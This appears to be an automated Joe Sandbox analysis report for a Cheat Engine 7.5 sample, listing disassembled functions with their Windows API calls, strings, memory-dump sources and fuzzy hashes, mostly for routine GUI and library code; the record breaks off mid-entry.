API String ID: 3852720340-0
Opcode ID: 53b3848c6b998e51a9fdb671a8295d41a5bcb9f69a7e0922d3ac22b6735b0273
Instruction ID: e207b2b98be06f9ff77bfd8136b11bf86f65762492dd39218fa1a1e2b172c1b0
Opcode Fuzzy Hash: 53b3848c6b998e51a9fdb671a8295d41a5bcb9f69a7e0922d3ac22b6735b0273
Instruction Fuzzy Hash: 8D01D4B261C7116EEB3C1AB75EC5A5637A4EB3377D320063AE320951D0EF9D88218555

Function 6B4F1997 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 6B4F1A1E
RedrawWindow.USER32(?,?,00000000,00000105), ref: 6B4F1A33
IsRectEmpty.USER32(?), ref: 6B4F1A8B
RedrawWindow.USER32(?,?,00000000,00000105), ref: 6B4F1AB7

Part of subcall function 6B4F1ACE: RedrawWindow.USER32(00000000,?,00000000,00000105), ref: 6B4F1B42

Strings

0#Lk, xrefs: 6B4F1A9F

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: RedrawWindow$EmptyRect
String ID: 0#Lk
API String ID: 138230908-1841850333
Opcode ID: 07347cd6a2e540486edcbb4e2c4263d707240e0a93cbd90ac44ed099da0541f1
Instruction ID: ce9b818c784156fe6bf3ae5efccae491adfc7f3b03f7dbcb32f660f61cec6cd2
Opcode Fuzzy Hash: 07347cd6a2e540486edcbb4e2c4263d707240e0a93cbd90ac44ed099da0541f1
Instruction Fuzzy Hash: F4415EB1E006259BCF05DFA5C884FEEB7B9EF49704F144069ED05AB250C779AA46CFA0

Function 6B4E0960 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 6B4E098A
GetCurrentProcess.KERNEL32 ref: 6B4E0995
DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000002), ref: 6B4E09A8
GetLastError.KERNEL32 ref: 6B4E09CF

Strings

0#Lk, xrefs: 6B4E09BF

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID: 0#Lk
API String ID: 3907606552-1841850333
Opcode ID: 7042c26f13a8b9d7cdff6a56ce9ebc6edc2786349ccc3fd2857e25d877f944e7
Instruction ID: 3f900b80ec02cc22f0bd096abaaccdf2b418ae5230f7cf4ce1c53a89accd80dd
Opcode Fuzzy Hash: 7042c26f13a8b9d7cdff6a56ce9ebc6edc2786349ccc3fd2857e25d877f944e7
Instruction Fuzzy Hash: 49115135A00204ABDB109FB6C889E9EBBB8FB45711F044569E915DB341DB78EC01CBA0

Function 6B605A02 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6B605AC3,00000000,?,00000001,00000000,?,6B605B3A,00000001,FlsFree,6B66750C,FlsFree,00000000), ref: 6B605A92

Strings

api-ms-, xrefs: 6B605A52

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: a64d112c6c19c0c614a45276860d5d9b96bdbd65db2c8038a5c02a6cd0bcdd67
Instruction ID: 76e9b92607183c4ccbba905da1f614cf66bcf371d6d97adabcc91261c012ec49
Opcode Fuzzy Hash: a64d112c6c19c0c614a45276860d5d9b96bdbd65db2c8038a5c02a6cd0bcdd67
Instruction Fuzzy Hash: 1711E972E45625AFDF269A6E8DC479E37A49F06BB0F100152FE10EB290DB78ED0097D1

Function 6B4D2AF6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,?,00000000,?,?,6B4DE4AA,?,00000000,A934EE1E,?,00000000,00000000,Function_0016966C,000000FF,?,6B4E44A3), ref: 6B4D2B09
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6B4D2B19

Strings

RegDeleteKeyTransactedW, xrefs: 6B4D2B13
0#Lk, xrefs: 6B4D2B32
Advapi32.dll, xrefs: 6B4D2B04

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: 0#Lk$Advapi32.dll$RegDeleteKeyTransactedW
API String ID: 1646373207-534185125
Opcode ID: 71cbf3b6c8e1086d739059546fb68deac11e74067db2d18edc3315564040d498
Instruction ID: 111a2819814ce0ce6a3f1de73cc271950a1cffefd7c4101a64f234c2ebc10dac
Opcode Fuzzy Hash: 71cbf3b6c8e1086d739059546fb68deac11e74067db2d18edc3315564040d498
Instruction Fuzzy Hash: BAF0B473200509AFEF102E99DCE4CABBB9DEB852A9310817EF750C2220CE75CC029B70

Function 6B4E4A00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 6B4E4A17
GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedW), ref: 6B4E4A27

Strings

GetFileAttributesTransactedW, xrefs: 6B4E4A21
kernel32.dll, xrefs: 6B4E4A12
0#Lk, xrefs: 6B4E4A40

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: 0#Lk$GetFileAttributesTransactedW$kernel32.dll
API String ID: 1646373207-2862805169
Opcode ID: 04c76d978ead7eb6e35606ec49fc7e16fdfd20d7828d6165b7e34c5a2965f074
Instruction ID: 2459cbb1c1efea382b336d820282d1a64b9096e25bea9c7ffd5003db8a038931
Opcode Fuzzy Hash: 04c76d978ead7eb6e35606ec49fc7e16fdfd20d7828d6165b7e34c5a2965f074
Instruction Fuzzy Hash: 0DF09032105205DFEF216ED69D54FAA77D8FB042A7F00646AF62196260C77DC851CBB4

Function 6B4F59A0 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 6B4D4ACF: __EH_prolog3.LIBCMT ref: 6B4D4AD6
Part of subcall function 6B4D4ACF: GetDC.USER32(00000000), ref: 6B4D4B02

IsRectEmpty.USER32(?), ref: 6B4F59C8
InvertRect.USER32(?,?), ref: 6B4F59D6
SetRectEmpty.USER32(?), ref: 6B4F59E8
GetClientRect.USER32(?,6B4F3CD7), ref: 6B4F5A05
InvertRect.USER32(?,?), ref: 6B4F5A55

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Rect$EmptyInvert$ClientH_prolog3
String ID:
API String ID: 1656078942-0
Opcode ID: 3036f29232651c28f2ce25788c49460ef2f9e91af9d0783be9fa8326f5bfb83d
Instruction ID: b83af88d00d0703882f5dcbcebecadfa11a794339df05398df0734c53cb82d49
Opcode Fuzzy Hash: 3036f29232651c28f2ce25788c49460ef2f9e91af9d0783be9fa8326f5bfb83d
Instruction Fuzzy Hash: 02214F71A006099FCB15DFB5C885EEEBBF9EF49304F10406EE505E7210E775AA46CB60

Function 6B4DE9FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103timeCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6B4DEA68
SetTimer.USER32(00000000,?,00000000,6B4DDEFF), ref: 6B4DEB02

Part of subcall function 6B4D9057: GetModuleHandleW.KERNEL32(shell32.dll,00000000,?,6B4DEA91,6B665AB4,00000000,00000000,6B4E2319,00000008,00000000,?,?,6B4DDC1B,00000000,00000001,?), ref: 6B4D9069
Part of subcall function 6B4D9057: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6B4D9079
Part of subcall function 6B4D9057: EncodePointer.KERNEL32(00000000,?,6B4DEA91,6B665AB4,00000000,00000000,6B4E2319,00000008,00000000,?,?,6B4DDC1B,00000000,00000001,?,?), ref: 6B4D9082

CoTaskMemFree.OLE32(?), ref: 6B4DEAD3

Strings

0#Lk, xrefs: 6B4DEAB7, 6B4DEAEA

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: AddressEncodeFreeH_prolog3HandleModulePointerProcTaskTimer
String ID: 0#Lk
API String ID: 2745541394-1841850333
Opcode ID: c880a58c44fd1661597a76855f6e719735c4af83d1508e207dfff46fd4c0fc2d
Instruction ID: 9f78225ee61c92617d33f3cc97925b89fe5b68dd57f18058f30172351e1f11ac
Opcode Fuzzy Hash: c880a58c44fd1661597a76855f6e719735c4af83d1508e207dfff46fd4c0fc2d
Instruction Fuzzy Hash: F7312074700206ABCF18DB64CC55FBEF7A4FF48760F00412DE52AA7290DB39A900CBA1

Function 6B4D19C1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetMessageW.USER32(00000030,00000000,00000000,00000000), ref: 6B4D18FA
TranslateMessage.USER32(00000030), ref: 6B4D1919
DispatchMessageW.USER32(00000030), ref: 6B4D1920

Strings

0#Lk, xrefs: 6B4D19D6

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Message$DispatchTranslate
String ID: 0#Lk
API String ID: 1706434739-1841850333
Opcode ID: 65f090c53dd733656b183b58a88e63c242e621bc27283fa2a0ea54dcf7926093
Instruction ID: 901d85a6adff11edf2e870cc6196729c080f28c40a23827c0aeac6b0280a886f
Opcode Fuzzy Hash: 65f090c53dd733656b183b58a88e63c242e621bc27283fa2a0ea54dcf7926093
Instruction Fuzzy Hash: A2F044327018315BDB526B759864FBF776DEF8626534510A9EC01D3210EB2CD902C7E2

Function 6B4D9807 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 6B4D9822
GetClassNameW.USER32(?,?,0000000A), ref: 6B4D9837
CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF,?,6B4C944D,?,?), ref: 6B4D984E

Strings

combobox, xrefs: 6B4D983F

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: ClassCompareLongNameStringWindow
String ID: combobox
API String ID: 1414938635-2240613097
Opcode ID: fc4aac4c9ff1bf4b840adaaf8e0602f5246aced3f640da8d6085b5805f7768ff
Instruction ID: d16d4b4f2d07ceb2c1e4db26a5904266d22a365a6738436ef115986d558e7394
Opcode Fuzzy Hash: fc4aac4c9ff1bf4b840adaaf8e0602f5246aced3f640da8d6085b5805f7768ff
Instruction Fuzzy Hash: 98F0F431664119BBCF40EF688D06EEE77A89B17B20F000325F521E71C1CA64D50187A4

Function 6B4EA88A Relevance: 6.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,00000018,?), ref: 6B4EA922
DeleteObject.GDI32(00000000), ref: 6B4EA9EC
DeleteObject.GDI32(00000000), ref: 6B4EA9F5
DeleteObject.GDI32(00000000), ref: 6B4EAA04

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Object$Delete
String ID:
API String ID: 774837909-0
Opcode ID: a31ba89f3dcef83845c18bef080fe132887bbcf27903362ddfa5f01c94f077de
Instruction ID: 19ad7d64942eea6eb461499b37dbe02ac9908d848855d64fb5ecc9437e04508a
Opcode Fuzzy Hash: a31ba89f3dcef83845c18bef080fe132887bbcf27903362ddfa5f01c94f077de
Instruction Fuzzy Hash: 9E418D31E4420ADBDF10DEA4C881FDEB7B5BF44706F118965E810A7280D77CC986CBA0

Function 6B4D4B38 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6B4D4B3F
BeginPaint.USER32(?,?,00000004,6B4CA39F), ref: 6B4D4B6B
__EH_prolog3.LIBCMT ref: 6B4D4B94
CreatePen.GDI32(?,?,?), ref: 6B4D4BB5

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: H_prolog3$BeginCreatePaint
String ID:
API String ID: 3507124140-0
Opcode ID: a4d0929d35d1f9d521ae0e6d298ecf2daaef77fbb230aff754a5b8179f2ecaac
Instruction ID: 8472efd5c826929bfe580710607a8877373792b7fd586802d4a510705e909a21
Opcode Fuzzy Hash: a4d0929d35d1f9d521ae0e6d298ecf2daaef77fbb230aff754a5b8179f2ecaac
Instruction Fuzzy Hash: 741139F06106199FDB24DF79C911B9E7BE5AF18704F10892EEA69C7640CB78D940CB98

Function 6B4CB9DD Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 6B4CB9E4
GetTopWindow.USER32(00000000), ref: 6B4CBA27
GetWindow.USER32(00000000,00000002), ref: 6B4CBA49

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 41ddc6137c5cf1a7895109344abf793337462783ab11f38e72c76e8d9d0a8f70
Instruction ID: db05a2c529b63a8734b518717ce6504cdddedb0be8910f2780de5d89ba333c8a
Opcode Fuzzy Hash: 41ddc6137c5cf1a7895109344abf793337462783ab11f38e72c76e8d9d0a8f70
Instruction Fuzzy Hash: 9601A93640151DABCF125F918D05EDF3F2AAF0AB90F005054F95955170C73AC961EB96

Function 6B4F4F0B Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,?,00000001,?,6B4F1798), ref: 6B4F4F21
InvalidateRect.USER32(?,?,00000001), ref: 6B4F4F46
InvalidateRect.USER32(?,?,00000001,?), ref: 6B4F4F6F
UpdateWindow.USER32(?), ref: 6B4F4F83

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: InvalidateRect$UpdateWindow
String ID:
API String ID: 488614814-0
Opcode ID: 4228bac3f71cea250b869bfac5457115e8f73e0f301bc1ebf3220b99cc6087e8
Instruction ID: 0b82debfdbb943b426a1502017b3c4b490b5d122b6ecc639babdb4c30732fc64
Opcode Fuzzy Hash: 4228bac3f71cea250b869bfac5457115e8f73e0f301bc1ebf3220b99cc6087e8
Instruction Fuzzy Hash: 030108722106009FEB619B59CA44F92B7F9BF48752F010599E19ED72B0DB74E842CB10

Function 6B4DB997 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

Part of subcall function 6B4CA2F6: GetDlgCtrlID.USER32 ref: 6B4CA307

GetParent.USER32(?), ref: 6B4DB9C3

Strings

0#Lk, xrefs: 6B4DB9F3, 6B4DBA2B, 6B4DBA4D, 6B4DBA68, 6B4DBA88, 6B4DBAAB, 6B4DBAD6

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: CtrlParent
String ID: 0#Lk
API String ID: 315306666-1841850333
Opcode ID: 25e68090528e2176e4698315fbc6e3775b266e11bd0b27e80618e95aa2aa49ea
Instruction ID: 4b9ffc5865ce383f998dc56f195dfba9489e9aef062dff4033f340db5fa175b6
Opcode Fuzzy Hash: 25e68090528e2176e4698315fbc6e3775b266e11bd0b27e80618e95aa2aa49ea
Instruction Fuzzy Hash: C941BF35785216CFCB119B28C868FBD77A1FF4A760F0900A5EA16D7390DB38AC42CB91

Function 6B4F9A6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 6B4F9B0B
SetFocus.USER32(00000000,?,?,00000000,?,6B4F8FBE,?,?,?,00000000,00000007,?,?,?,6B501BB2,?), ref: 6B4F9B16

Strings

0#Lk, xrefs: 6B4F9B00

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: FocusWindow
String ID: 0#Lk
API String ID: 348293334-1841850333
Opcode ID: c15c5f9e2fc590835e4d27e32f70917d4977c4e59ec845f9793194de9ddbf5a4
Instruction ID: e1f074b1b50501dc5d5454bea2a1c315dddd9ffd7e71c3c9c99c309a92369610
Opcode Fuzzy Hash: c15c5f9e2fc590835e4d27e32f70917d4977c4e59ec845f9793194de9ddbf5a4
Instruction Fuzzy Hash: 5621DE71700701ABDB089F29D884F5AB77DFF89324B04466AE50987746D776F892CBE0

Function 6B4F0A67 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

